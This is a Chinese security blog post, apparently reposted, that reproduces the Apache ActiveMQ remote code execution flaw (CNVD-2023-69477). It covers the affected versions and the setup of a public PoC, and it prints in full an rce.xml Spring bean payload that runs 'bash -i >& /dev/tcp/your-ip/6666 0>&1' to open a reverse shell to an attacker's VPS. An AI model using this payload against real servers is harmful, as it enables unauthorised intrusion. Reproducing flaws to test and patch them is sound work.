Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

admin 2023年10月31日09:10:20评论91 views字数 1109阅读3分41秒阅读模式

0x01 产品简介

  ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。

0x02 漏洞概述

 Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。


0x03 影响范围

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16 


0x04 漏洞复现

PoC地址:https://github.com/trganda/ActiveMQ-RCE

把项目Get到本地,导入IDEA中运行

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)


直接运行会发现报错:java: 警告: 源发行版 11 需要目标发行版 11

PS:这种一般是你idea的 配置文件iml 与 项目中 配置的jdk版本是不一致导致的,需要安装jdk11

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)



漏洞利用

修改Main.java以下两处

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

反弹shell 

将rce.xml,上传至vps


<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/your-ip/6666 0>&1]]></value>
</list>
</constructor-arg>
</bean>

利用python开启http服务  

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

nc开启监听

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

运行Main.java

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

成功反弹shell

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

原文始发于微信公众号(实战攻防安全):Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日09:10:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)https://cn-sec.com/archives/2151417.html

发表评论

匿名网友 填写信息